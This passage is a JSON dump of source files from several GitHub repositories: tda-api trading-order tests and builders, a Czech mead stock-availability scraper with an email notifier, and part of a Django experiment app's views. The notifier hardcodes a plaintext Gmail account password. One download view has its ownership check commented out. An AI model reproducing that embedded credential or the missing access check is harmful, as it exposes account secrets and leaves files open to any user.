199.99).build()))\n\n def test_equity_buy_to_cover_market(self):\n self.assertFalse(has_diff({\n 'orderType': 'MARKET',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'BUY_TO_COVER',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_buy_to_cover_market('GOOG', 10).build()))\n\n def test_equity_buy_to_cover_limit(self):\n self.assertFalse(has_diff({\n 'orderType': 'LIMIT',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'price': '199.99',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'BUY_TO_COVER',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_buy_to_cover_limit('GOOG', 10, 199.99).build()))\n"
},
{
"alpha_fraction": 0.6559766530990601,
"alphanum_fraction": 0.6734693646430969,
"avg_line_length": 15.333333015441895,
"blob_id": "621b2711dce0cd9e1f2d6db667d7f4c3870344d9",
"content_id": "4d86dfb0fde85f9a8eb9e79f4e8385a5fbd1bd87",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 343,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 21,
"path": "/tox.ini",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "[tox]\nenvlist =\n {py36,py37,py38}\n coverage\n\n[testenv]\ndeps =\n -rrequirements.txt\n\nsetenv =\n TESTPATH=tests/\n RCFILE=setup.cfg\ncommands =\n coverage run --rcfile={env:RCFILE} --source=tda -p -m pytest {env:TESTPATH}\n\n[testenv:coverage]\nskip_install = true\ncommands =\n coverage combine\n coverage report\n coverage html\n"
},
{
"alpha_fraction": 0.607800304889679,
"alphanum_fraction": 0.6171606779098511,
"avg_line_length": 35.42045593261719,
"blob_id": "d3d011ad32ff5e102e9fd7501946d71fdc675c6e",
"content_id": "9294fe4915050db7a93dacbba4b6d2e89523fd2d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3205,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 88,
"path": "/tests/test_utils.py",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "from unittest.mock import MagicMock\n\nimport datetime\nimport json\nimport unittest\n\nfrom tda.orders.equities import EquityOrderBuilder\nfrom tda.utils import AccountIdMismatchException, Utils\nfrom tda.utils import UnsuccessfulOrderException\nfrom . import test_utils\nfrom .utils import no_duplicates, MockResponse\n\n\nclass UtilsTest(unittest.TestCase):\n\n def setUp(self):\n self.mock_client = MagicMock()\n self.account_id = 10000\n self.utils = Utils(self.mock_client, self.account_id)\n\n self.order_id = 1\n\n self.maxDiff = None\n\n ##########################################################################\n # extract_order_id tests\n\n @no_duplicates\n def test_extract_order_id_order_not_ok(self):\n response = MockResponse({}, False)\n with self.assertRaises(\n UnsuccessfulOrderException, msg='order not successful'):\n self.utils.extract_order_id(response)\n\n @no_duplicates\n def test_extract_order_id_no_location(self):\n response = MockResponse({}, True, headers={})\n self.assertIsNone(self.utils.extract_order_id(response))\n\n @no_duplicates\n def test_extract_order_id_no_pattern_match(self):\n response = MockResponse({}, True, headers={\n 'Location': 'https://api.tdameritrade.com/v1/accounts/12345'})\n self.assertIsNone(self.utils.extract_order_id(response))\n\n @no_duplicates\n def test_get_order_nonmatching_account_id(self):\n response = MockResponse({}, True, headers={\n 'Location':\n 'https://api.tdameritrade.com/v1/accounts/{}/orders/456'.format(\n self.account_id + 1)})\n with self.assertRaises(\n AccountIdMismatchException,\n msg='order request account ID != Utils.account_id'):\n self.utils.extract_order_id(response)\n\n @no_duplicates\n def test_get_order_nonmatching_account_id_str(self):\n self.utils = Utils(self.mock_client, str(self.account_id))\n\n response = MockResponse({}, True, headers={\n 'Location':\n 'https://api.tdameritrade.com/v1/accounts/{}/orders/456'.format(\n self.account_id + 1)})\n with self.assertRaises(\n AccountIdMismatchException,\n msg='order request account ID != Utils.account_id'):\n self.utils.extract_order_id(response)\n\n @no_duplicates\n def test_get_order_success(self):\n order_id = self.account_id + 100\n response = MockResponse({}, True, headers={\n 'Location':\n 'https://api.tdameritrade.com/v1/accounts/{}/orders/{}'.format(\n self.account_id, order_id)})\n self.assertEqual(order_id, self.utils.extract_order_id(response))\n\n @no_duplicates\n def test_get_order_success_str_account_id(self):\n self.utils = Utils(self.mock_client, str(self.account_id))\n\n order_id = self.account_id + 100\n response = MockResponse({}, True, headers={\n 'Location':\n 'https://api.tdameritrade.com/v1/accounts/{}/orders/{}'.format(\n self.account_id, order_id)})\n self.assertEqual(order_id, self.utils.extract_order_id(response))\n"
},
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 16.799999237060547,
"blob_id": "6adb26c7cb1525fc47a36ace34b623bd0dd4b834",
"content_id": "654c7142531ec8736d83943220f048b274786f1f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 5,
"path": "/tda/orders/__init__.py",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "from enum import Enum\n\nfrom . import common\nfrom . import equities\nfrom . import generic\n\n"
},
{
"alpha_fraction": 0.6199616193771362,
"alphanum_fraction": 0.6201748847961426,
"avg_line_length": 33.605167388916016,
"blob_id": "18f3960514e20df4e383985abe5b508c4c75f2aa",
"content_id": "9c4ec520d6d9685ea040d4186afe02fdb76d113c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9378,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 271,
"path": "/tda/orders/equities.py",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "from enum import Enum\n\nfrom tda.orders.common import InvalidOrderException\nfrom tda.orders.common import InvalidOrderException, Duration, Session\n\n\n_DEPRECATION_WARNED = False\n\n\nclass EquityOrderBuilder:\n '''Helper class to construct equity orders.'''\n\n def __init__(self, symbol, quantity):\n '''Create an order for the given symbol and quantity. Note all\n unspecified parameters must be set prior to building the order spec.\n\n **WARNING:** This class is deprecated in favor of the\n :ref:`tda.orders.generic.OrderBuilder` and the order template helpers.\n It will be removed in a future release.\n\n :param symbol: Symbol for the order\n :param quantity: Quantity of the order\n '''\n global _DEPRECATION_WARNED\n if not _DEPRECATION_WARNED:\n import sys\n print('WARNING: EquityOrderBuilder has been deprecated. Please ' +\n 'migrate to one of the new order templates or use the ' +\n 'generic OrderBuilder class. You can find documentation on ' +\n 'its replacement heres: https://tda-api.readthedocs.io/en/'+\n 'stable/order-templates.html', file=sys.stderr)\n _DEPRECATION_WARNED = True\n\n self.symbol = symbol\n self.quantity = quantity\n\n self.instruction = None\n self.order_type = None\n self.price = None\n self.duration = None\n self.session = None\n\n def __assert_set(self, name):\n value = getattr(self, name)\n if value is None:\n raise InvalidOrderException('{} must be set'.format(name))\n return value\n\n # Instructions\n class Instruction(Enum):\n '''Order instruction'''\n BUY = 'BUY'\n SELL = 'SELL'\n\n def set_instruction(self, instruction):\n '''Set the order instruction'''\n assert isinstance(instruction, self.Instruction)\n self.instruction = instruction\n return self\n\n # Order types\n class OrderType(Enum):\n '''Order type'''\n MARKET = 'MARKET'\n LIMIT = 'LIMIT'\n\n def set_order_type(self, order_type):\n '''Set the order type'''\n assert isinstance(order_type, self.OrderType)\n self.order_type = order_type\n return self\n\n # Price\n def set_price(self, price):\n '''Set the order price. Must be set for ``LIMIT`` orders.'''\n assert price > 0.0\n self.price = price\n return self\n\n # Durations\n def set_duration(self, duration):\n '''Set the order duration'''\n assert isinstance(duration, Duration)\n self.duration = duration\n return self\n\n # Sessions\n def set_session(self, session):\n '''Set the order's session'''\n assert isinstance(session, Session)\n self.session = session\n return self\n\n def build(self):\n '''Build the order spec.\n\n :raise InvalidOrderException: if the order is not fully specified\n '''\n spec = {\n 'orderType': self.__assert_set('order_type').value,\n 'session': self.__assert_set('session').value,\n 'duration': self.__assert_set('duration').value,\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': self.__assert_set('instruction').value,\n 'quantity': self.quantity,\n 'instrument': {\n 'symbol': self.symbol,\n 'assetType': 'EQUITY'}\n }]\n }\n\n if self.order_type == self.OrderType.LIMIT:\n spec['price'] = self.__assert_set('price')\n else:\n assert self.price is None\n\n return spec\n\n\n##########################################################################\n# Buy orders\n\n\ndef equity_buy_market(symbol, quantity):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n buy market order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.MARKET)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.BUY, symbol, quantity))\n\n\ndef equity_buy_limit(symbol, quantity, price):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n buy limit order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.LIMIT)\n .set_price(price)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.BUY, symbol, quantity))\n\n##########################################################################\n# Sell orders\n\n\ndef equity_sell_market(symbol, quantity):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n sell market order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.MARKET)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.SELL, symbol, quantity))\n\n\ndef equity_sell_limit(symbol, quantity, price):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n sell limit order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.LIMIT)\n .set_price(price)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.SELL, symbol, quantity))\n\n##########################################################################\n# Short sell orders\n\n\ndef equity_sell_short_market(symbol, quantity):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n short sell market order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.MARKET)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.SELL_SHORT, symbol, quantity))\n\n\ndef equity_sell_short_limit(symbol, quantity, price):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n short sell limit order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.LIMIT)\n .set_price(price)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.SELL_SHORT, symbol, quantity))\n\n##########################################################################\n# Buy to cover orders\n\n\ndef equity_buy_to_cover_market(symbol, quantity):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n buy-to-cover market order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.MARKET)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.BUY_TO_COVER, symbol, quantity))\n\n\ndef equity_buy_to_cover_limit(symbol, quantity, price):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n buy-to-cover limit order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.LIMIT)\n .set_price(price)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.BUY_TO_COVER, symbol, quantity))\n"
}
] | 7 |
vpos/Medovina_Stock_Tracker
|
https://github.com/vpos/Medovina_Stock_Tracker
|
e42467bcb5e0bf3470a3d735eccf4d20c81bab2c
|
65c14c3f308f176c78d9ee4905e9e4570b0cdcf3
|
e06230f18aaa91e474d62f2dc9b65529fac1c544
|
refs/heads/master
| 2022-04-03T02:17:09.289251 | 2020-01-24T20:42:44 | 2020-01-24T20:42:44 | 236,071,186 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8199999928474426,
"alphanum_fraction": 0.8199999928474426,
"avg_line_length": 24,
"blob_id": "d3906438f5ae839cab12292bd65372d874419ded",
"content_id": "c9cd078a158cfd92f09c1bffa04578dc93b78975",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 2,
"path": "/README.md",
"repo_name": "vpos/Medovina_Stock_Tracker",
"src_encoding": "UTF-8",
"text": "# Medovina_Stock_Tracker\nHlídač keltské medoviny.\n"
},
{
"alpha_fraction": 0.6321112513542175,
"alphanum_fraction": 0.6691951155662537,
"avg_line_length": 34.43283462524414,
"blob_id": "f9bc485ec2e4661a66f3f1bab8d910eaeaf0a3ad",
"content_id": "fedfc50e5b4d21e0922af8d6385a78f76c200e33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2383,
"license_type": "no_license",
"max_line_length": 527,
"num_lines": 67,
"path": "/scraper.py",
"repo_name": "vpos/Medovina_Stock_Tracker",
"src_encoding": "UTF-8",
"text": "from lxml import html\nfrom datetime import datetime\nimport time\nimport requests\nimport re\nimport traceback\nfrom lxml.cssselect import CSSSelector\nimport string\n\nimport notifier as Notif\nimport helpers as Helpers\n\ntry:\n # https://eshop.georgebee.com/keltska/ \n medovinyEndpoint = 'https://eshop.georgebee.com/keltska/'\n unavailableMsg = 'Momentálně nedostupné'\n availabilityFile = '/root/Medovina_Stock_Tracker/availability_status'\n availabilityFromFile = Helpers.read_file(availabilityFile)\n\n currentDatetime = datetime.now().strftime(\"%d.%m.%Y %H:%M:%S\")\n\n responseStatus = 0\n requestNumber = 0\n response = ''\n while (responseStatus != 200 and requestNumber < 10):\n time.sleep(3) # make a request every 3 secs\n requestNumber += 1\n try:\n response = requests.get(medovinyEndpoint)\n responseStatus = response.status_code\n except:\n pass\n\n if requestNumber < 10:\n scrapedHtml = str(response.content.decode('utf-8'))\n \n if unavailableMsg in scrapedHtml:\n Helpers.write_to_file(availabilityFile, f'{currentDatetime}: {unavailableMsg}')\n \n elif unavailableMsg in availabilityFromFile:\n # send notif email\n Helpers.write_to_file(availabilityFile, f'{currentDatetime}: Dostupné!')\n urlButton = f'<a href=\"{medovinyEndpoint}\"><button style=\"margin-left:0; box-shadow: rgb(41, 108, 146) 0px 4px 9px -2px; background: linear-gradient(rgb(41, 108, 146) 5%, rgb(41, 108, 146) 100%) rgb(41, 108, 146); border-radius: 4px; border: 1px solid rgb(41, 108, 146); display: inline-block; color: rgb(255, 255, 255); font-family: Helvetica; font-size: 15px; font-weight: bold; padding: 5px 14px; cursor: grab !important; text-decoration: none; text-shadow: rgb(41, 73, 123) 0px 1px 0px;\">Přejít na odkaz</button></a>'\n\n notifMessage = f\"\"\"\\\n <html>\n <body>\n <p> Keltská medovina je naskladněná! <br>\n <br>\n {urlButton}\n </p>\n </body>\n </html>\n \"\"\"\n Notif.email_notif('[email protected]','','Medovina Scraper - Medovina na skladě!', notifMessage)\n\nexcept:\n traceback.print_exc()\n exception = '\\n'.join(traceback.format_exc())\n errorMessage = f\"\"\"\\\n <html>\n <body>\n <p> A new error has just been produced: {exception} </p>\n </body>\n </html>\n \"\"\"\n Notif.email_notif('[email protected]','[email protected]','Medovina Scraper - New Error', errorMessage)"
},
{
"alpha_fraction": 0.6699375510215759,
"alphanum_fraction": 0.6779661178588867,
"avg_line_length": 24.477272033691406,
"blob_id": "3deff66eed43c91ddc8140d965278871af20a7da",
"content_id": "70b5adf370696e90880a3f22647b28fb8436677b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1121,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 44,
"path": "/notifier.py",
"repo_name": "vpos/Medovina_Stock_Tracker",
"src_encoding": "UTF-8",
"text": "# function to notify about:\n# 1. houses\n# 2. errors\n# parameters\n\nimport smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nimport time\n\n# TODO setup email \ndef email_notif(receiver, cc, subject, msg):\n sender_email = \"[email protected]\"\n password = \"enth364+!0N\"\n\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = subject\n message[\"From\"] = sender_email\n message[\"To\"] = receiver\n message['Cc'] = cc\n\n text = f\"\"\"\\\n \"\"\"\n html = f\"\"\"\\\n {msg}\n \"\"\"\n\n # Turn these into plain/html MIMEText objects\n part1 = MIMEText(text, \"plain\")\n part2 = MIMEText(html, \"html\")\n\n # Add HTML/plain-text parts to MIMEMultipart message\n # The email client will try to render the last part first\n message.attach(part1)\n message.attach(part2)\n\n # Create secure connection with server and send email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", 465, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(\n sender_email, [receiver, cc], message.as_string()\n )\n server.quit()\n"
},
{
"alpha_fraction": 0.6080306172370911,
"alphanum_fraction": 0.6137667298316956,
"avg_line_length": 19.959999084472656,
"blob_id": "916f224002bd8dca308ccdca0417262e0ecc9c2d",
"content_id": "bdb5dedef106f163fd0995125b58839ab614161d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 25,
"path": "/helpers.py",
"repo_name": "vpos/Medovina_Stock_Tracker",
"src_encoding": "UTF-8",
"text": "# support functions that are used in multiple files\n\nimport gspread\nimport json\nfrom oauth2client.client import SignedJwtAssertionCredentials\nimport sys,traceback\nimport codecs\n\nsys.path.append('../')\n\n\ndef write_to_file(filename, data):\n f= codecs.open(filename,'w', 'utf-8') \n f.write(data)\n f.close()\n\ndef read_file(filename):\n \n f= codecs.open(filename,'r', 'utf-8') \n list = []\n for items in f:\n list.append(items)\n f.close()\n\n return items"
}
] | 4 |
marcelacrosariol/TG
|
https://github.com/marcelacrosariol/TG
|
fcb2c1b49951d6c6290616a109af333f54964ca0
|
1d0a08cebb67e23fed8e8cdc772ba3902a153a48
|
8e0fab42d751372581b0e77892bb9ba369bf232d
|
refs/heads/master
| 2021-08-23T21:52:41.674642 | 2017-12-06T18:17:04 | 2017-12-06T18:17:04 | 103,475,414 | 0 | 0 | null | 2017-09-14T02:27:07 | 2015-11-23T17:44:07 | 2016-01-09T03:27:55 | null |
[
{
"alpha_fraction": 0.5305126309394836,
"alphanum_fraction": 0.5305126309394836,
"avg_line_length": 22.20754623413086,
"blob_id": "664dabb28f0d3fce12b9809dfb41e8c5dd8f6f70",
"content_id": "f16c672f430722034c05cac3f22f7250e267dad6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1235,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 53,
"path": "/Django Proj/webapp/templates/footer.html",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "<div class=\"container\">\n\t<div id=\"footer\">\n\n\t\t{% if request.user.is_superuser == False %}\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\"> Informações </li>\n\t\t\t\t<li><a href=\"\"> Sobre </a></li>\n\t\t\t\t<li><a href=\"\"> Contato </a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t{% endif %}\n\n\t\t{% if request.user.is_authenticated == False %}\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\">Acesso</li>\n\t\t\t\t<li><a href=\"\"> Cadastrar </a></li>\n\t\t\t\t<li><a href=\"\"> Entrar</a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t{% endif %}\n\n\t\t{% if request.user.is_authenticated %}\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\">Experimentos</li>\n\t\t\t\t<li><a href=\"\"> Nova Execução </a></li>\n\t\t\t\t<li><a href=\"\"> Exemplos </a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t{% endif %}\n\n\t\t{% if request.user.is_superuser %}\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\">Usuários</li>\n\t\t\t\t<li><a href=\"\"> Listar todos</a></li>\n\t\t\t\t<li><a href=\"\"> Cadastrar novo</a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\">Algoritmos</li>\n\t\t\t\t<li><a href=\"\"> Listar todos</a></li>\n\t\t\t\t<li><a href=\"\"> Cadastrar novo</a></li>\n\t\t\t\t<li><a href=\"\"> Estatísticas </a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t{% endif %}\n\n\t</div>\n</div>"
},
{
"alpha_fraction": 0.7933753728866577,
"alphanum_fraction": 0.7933753728866577,
"avg_line_length": 34.22222137451172,
"blob_id": "8002c82b5783a830c7cdaeb9144363a77b750783",
"content_id": "32b5dd700e0a8c01ef4ed0c29647eb31851c11fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 18,
"path": "/Django Proj/webapp/webapp/regbackend.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "# from registration.views import RegistrationView\nfrom registration.backends.default.views import RegistrationView, ActivationView\nfrom experiment.forms import AppUserForm\nfrom experiment.models import AppUser\n\nclass MyRegistrationView(RegistrationView):\n\n\tform_class = AppUserForm\n\tsuccess_url = \"complete\"\n\n\tdef register(self, form_class):\n\t\tnew_user = super(MyRegistrationView,self).register(form_class)\n\t\tuser_profile = AppUser()\n\t\tuser_profile.usuario = new_user\n\t\tuser_profile.nickname = form_class.cleaned_data['nickname']\n\t\tuser_profile.company = form_class.cleaned_data['company']\n\t\tuser_profile.save()\n\t\treturn user_profile\n"
},
{
"alpha_fraction": 0.615523099899292,
"alphanum_fraction": 0.6163702011108398,
"avg_line_length": 31.734834671020508,
"blob_id": "f3a07ba22f9c9d185f27593cdb76dbc387abc879",
"content_id": "a622e20e5166532003ede7203961c6f3c4096d05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18895,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 577,
"path": "/Django Proj/webapp/experiment/views.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django.db.models import Count\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\nfrom django.template import RequestContext\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.models import User\nfrom experiment.forms import *\nfrom experiment.models import Execution, Algorithm, AppUser\nfrom django.http import HttpResponseRedirect, HttpResponse \nfrom django.core.urlresolvers import reverse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n# from django.core.files import File\n# jsonview - Crispy validation\n\nimport json, os\nfrom jsonview.decorators import json_view\nfrom crispy_forms.utils import render_crispy_form\nfrom crispy_forms.helper import FormHelper\nfrom django.contrib import messages\n# paginator\nfrom experiment.paginator import paginate\n\nfrom experiment.tasks import RunExperiment\nfrom random import randint\n\n#################### HOME #################### \n\ndef home(request):\n title = \"Home\"\n if not request.user.is_authenticated(): \n context = {\n 'title': title\n }\n return render(request, \"welcome.html\", context)\n else:\n form = (request.POST or None)\n showOpt = 'Todas'\n if request.method == 'POST':\n showOpt = request.POST.get(\"showOpt\")\n executionList = Execution.objects.filter().order_by('-id') if showOpt == 'Todas' else Execution.objects.filter(request_by__usuario__id=request.user.id).order_by('-id')\n else:\n executionList = Execution.objects.filter(request_by__usuario__id=request.user.id).order_by('-id')\n\n try:\n UserProf = AppUser.objects.get(usuario__id=request.user.id)\n except:\n print (\"Erro. Criando novo perfil\")\n user = User.objects.get(id=request.user.id)\n UserProf = AppUser(usuario=user)\n UserProf.save()\n print (\"Criado novo UserProf\")\n\n data, pageI = createPagination(request, executionList, UserProf.resultsPerPage)\n\n context = {\n 'showOpt': showOpt,\n 'title': title,\n 'data': data,\n 'pagesIndex': pageI,\n }\n return render(request, \"home.html\", context)\n\n#################### ABOUT #################### \n\ndef about(request):\n return render(request, \"about.html\", {})\n\n#################### CONTACT #################### \n\ndef contact(request):\n form = ContactForm(request.POST or None)\n if form.is_valid():\n subject = 'Portal Friends - Mensagem de %s ' % (\n form.cleaned_data.get(\"nome\"))\n from_email = settings.EMAIL_HOST_USER \n to_email = from_email\n sender = form.cleaned_data.get(\"email\")\n message = \"Contact: \" + sender + \"\\n\" + form.cleaned_data.get(\"mensagem\")\n send_mail(subject,\n message,\n from_email,\n [to_email],\n fail_silently=False)\n return HttpResponseRedirect(reverse('contact'))\n context = {\n 'form': form,\n }\n return render(request, \"contact.html\", context)\n\n#################### FILES DOWNLOAD / UPLOAD #################### \n\ndef downloadInputFile(request):\n expId = request.GET.get('id')\n execution = Execution.objects.get(pk=expId)\n # if (execution.request_by.usuario.id == request.user.id):\n # response = HttpResponse(\n # execution.inputFile, content_type='application/force-download')\n # response[\n # 'Content-Disposition'] = 'attachment; filename=\"entrada-Experimento-' + str(expId) + '\"'\n # return response\n # criar alerta\n response = HttpResponse(\n execution.inputFile, content_type='application/force-download')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"entrada-Experimento-' + str(expId) + '\"'\n return response\n # return HttpResponseRedirect(reverse('home'))\n\ndef downloadOutputFile(request):\n expId = request.GET.get('id')\n execution = Execution.objects.get(pk=expId)\n if (execution.request_by.usuario.id == request.user.id or request.user.is_superuser):\n # print (execution.outputFile.url)\n # print (\"Autorizado\")\n response = HttpResponse(\n execution.outputFile, content_type='application/force-download')\n response['Content-Disposition'] = 'attachment; filename=\"Resultado-Experimento-' + str(expId) + '\"'\n return response\n # print (\"Nao autorizado\")\n # criar alerta\n return HttpResponseRedirect(reverse('home'))\n\ndef downloadSample(request, alg):\n file = Algorithm.objects.get(nameAlg=alg).sample\n file_path = file.path\n \n response = HttpResponse(file, content_type='application/force-download')\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(file_path) \n return response\n\n#################### ADMIN - ALGORITHMS ####################\n\ndef listAlg(request):\n algorithmList = Algorithm.objects.filter().order_by('-idAlg') \n perPage = AppUser.objects.get(usuario=request.user.id).resultsPerPage\n\n data, pageI = createPagination(request, algorithmList, perPage)\n\n context = {\n 'title': 'Algoritmos',\n 'data': data,\n 'pagesIndex': pageI,\n }\n\n return render(request, \"admin/algorithm.html\", context)\n\ndef seeAlg(request, alg):\n title=\"Algoritmo\"\n\n algL = Algorithm.objects.get(idAlg=alg)\n\n data = {'nameAlg': algL.nameAlg, 'desc':algL.desc, 'sample':algL.sample,'file':algL.file}\n form = AlgorithmForm(request.POST or None, initial=data)\n\n context={\n 'title': title,\n 'form': form,\n 'idAlg': algL.idAlg,\n }\n\n return render(request, \"admin/edit_alg.html\", context)\n\ndef addAlg(request):\n form = AlgorithmForm(request.POST or None)\n return render(request, \"admin/add_algorithm.html\", {'form':form})\n\ndef updateAlg(request,idAlg):\n desc = request.POST.get(\"desc\")\n clear = request.POST.get(\"sample-clear\")\n\n algorithm = Algorithm.objects.get(idAlg=idAlg)\n \n if (clear == 'on'): algorithm.sample = None\n elif ('sample' in request.FILES): algorithm.sample = request.FILES['sample']\n\n algorithm.desc = desc\n algorithm.save()\n\n return HttpResponseRedirect(reverse('listAlgorithm'))\n \ndef saveAlg(request):\n\n #Get data from form\n name = request.POST.get('nameAlg')\n desc= request.POST.get('desc')\n algFile = request.FILES['file']\n \n #Get extension of the uploaded file\n extension = algFile.name.split(\".\")[-1].lower()\n \n #Default path of uploaded algorithms\n path = settings.MEDIA_ROOT + \"/algorithms/\"\n \n newAlg = Algorithm()\n newAlg.nameAlg = name\n newAlg.desc = desc\n newAlg.command = path + \"/\" +algFile.name\n newAlg.file=algFile\n \n if ('sample' in request.FILES): \n sample = request.FILES['sample']\n newAlg.sample=sample\n \n newAlg.save()\n \n #If the 